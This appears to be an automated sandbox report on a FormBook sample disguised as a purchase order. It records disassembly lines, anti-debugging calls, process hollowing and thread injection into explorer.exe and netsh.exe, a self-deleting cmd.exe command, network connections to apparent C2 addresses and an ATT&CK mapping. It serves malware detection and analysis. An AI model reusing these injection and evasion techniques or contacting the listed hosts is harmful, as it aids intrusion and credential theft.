Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3 mov ecx, dword ptr fs:[00000030h]	3_2_039C23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3 mov eax, dword ptr fs:[00000030h]	3_2_039C23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D131B mov eax, dword ptr fs:[00000030h]	3_2_039D131B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309 mov eax, dword ptr fs:[00000030h]	3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E8B58 mov eax, dword ptr fs:[00000030h]	3_2_039E8B58
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391F358 mov eax, dword ptr fs:[00000030h]	3_2_0391F358
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391DB40 mov eax, dword ptr fs:[00000030h]	3_2_0391DB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03943B7A mov eax, dword ptr fs:[00000030h]	3_2_03943B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03943B7A mov eax, dword ptr fs:[00000030h]	3_2_03943B7A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391DB60 mov ecx, dword ptr fs:[00000030h]	3_2_0391DB60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394D294 mov eax, dword ptr fs:[00000030h]	3_2_0394D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394D294 mov eax, dword ptr fs:[00000030h]	3_2_0394D294
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0392AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392AAB0 mov eax, dword ptr fs:[00000030h]	3_2_0392AAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394FAB0 mov eax, dword ptr fs:[00000030h]	3_2_0394FAB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]	3_2_039152A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]	3_2_039152A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]	3_2_039152A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]	3_2_039152A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039152A5 mov eax, dword ptr fs:[00000030h]	3_2_039152A5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942ACB mov eax, dword ptr fs:[00000030h]	3_2_03942ACB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942AE4 mov eax, dword ptr fs:[00000030h]	3_2_03942AE4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF mov eax, dword ptr fs:[00000030h]	3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov eax, dword ptr fs:[00000030h]	3_2_03915210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov ecx, dword ptr fs:[00000030h]	3_2_03915210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov eax, dword ptr fs:[00000030h]	3_2_03915210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03915210 mov eax, dword ptr fs:[00000030h]	3_2_03915210
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391AA16 mov eax, dword ptr fs:[00000030h]	3_2_0391AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391AA16 mov eax, dword ptr fs:[00000030h]	3_2_0391AA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DAA16 mov eax, dword ptr fs:[00000030h]	3_2_039DAA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DAA16 mov eax, dword ptr fs:[00000030h]	3_2_039DAA16
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03933A1C mov eax, dword ptr fs:[00000030h]	3_2_03933A1C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03928A0A mov eax, dword ptr fs:[00000030h]	3_2_03928A0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03954A2C mov eax, dword ptr fs:[00000030h]	3_2_03954A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03954A2C mov eax, dword ptr fs:[00000030h]	3_2_03954A2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A229 mov eax, dword ptr fs:[00000030h]	3_2_0393A229
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DEA55 mov eax, dword ptr fs:[00000030h]	3_2_039DEA55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039A4257 mov eax, dword ptr fs:[00000030h]	3_2_039A4257
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]	3_2_03919240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]	3_2_03919240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]	3_2_03919240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03919240 mov eax, dword ptr fs:[00000030h]	3_2_03919240
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0395927A mov eax, dword ptr fs:[00000030h]	3_2_0395927A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CB260 mov eax, dword ptr fs:[00000030h]	3_2_039CB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CB260 mov eax, dword ptr fs:[00000030h]	3_2_039CB260
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E8A62 mov eax, dword ptr fs:[00000030h]	3_2_039E8A62
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942990 mov eax, dword ptr fs:[00000030h]	3_2_03942990
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393C182 mov eax, dword ptr fs:[00000030h]	3_2_0393C182
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394A185 mov eax, dword ptr fs:[00000030h]	3_2_0394A185
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]	3_2_039951BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]	3_2_039951BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]	3_2_039951BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039951BE mov eax, dword ptr fs:[00000030h]	3_2_039951BE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov eax, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov eax, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov ecx, dword ptr fs:[00000030h]	3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF mov eax, dword ptr fs:[00000030h]	3_2_039399BF

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086F175 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0086F175
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00871C5F SetUnhandledExceptionFilter,	0_2_00871C5F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086BEA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0086BEA1

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 119.81.172.165 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.194.171.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.115 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.138.72.189 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 168.206.180.179 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 13.248.196.204 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.246.6.109 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.213.99 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 208.91.197.160 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.208.77.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Users\user\Desktop\Purchase Order 40,7045.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: D90000

Jump to behavior

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe C:\Users\user\Desktop\Purchase Order 40,7045.exe			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'			Jump to behavior

Source: explorer.exe, 00000002.00000000.241465822.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.241593673.0000000001980000.00000002.00000001.sdmp, netsh.exe, 00000003.00000002.500552216.0000000005070000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_008758AF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_008750B8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoA,	0_2_0086F02E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_008759D6
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0087596F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0087416E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00879AEC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_00875A12
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_00879A12
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	0_2_0087AB36
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_008754E7
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_0087146E
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00874DCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_008755DC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_00875683
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_008756DE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_0086AFDD

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 0_2_0087237A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0087237A

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection512	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery131	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection512	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Purchase Order 40,7045.exe	40%	Virustotal		Browse
Purchase Order 40,7045.exe	33%	ReversingLabs	Win32.Trojan.Generic
Purchase Order 40,7045.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

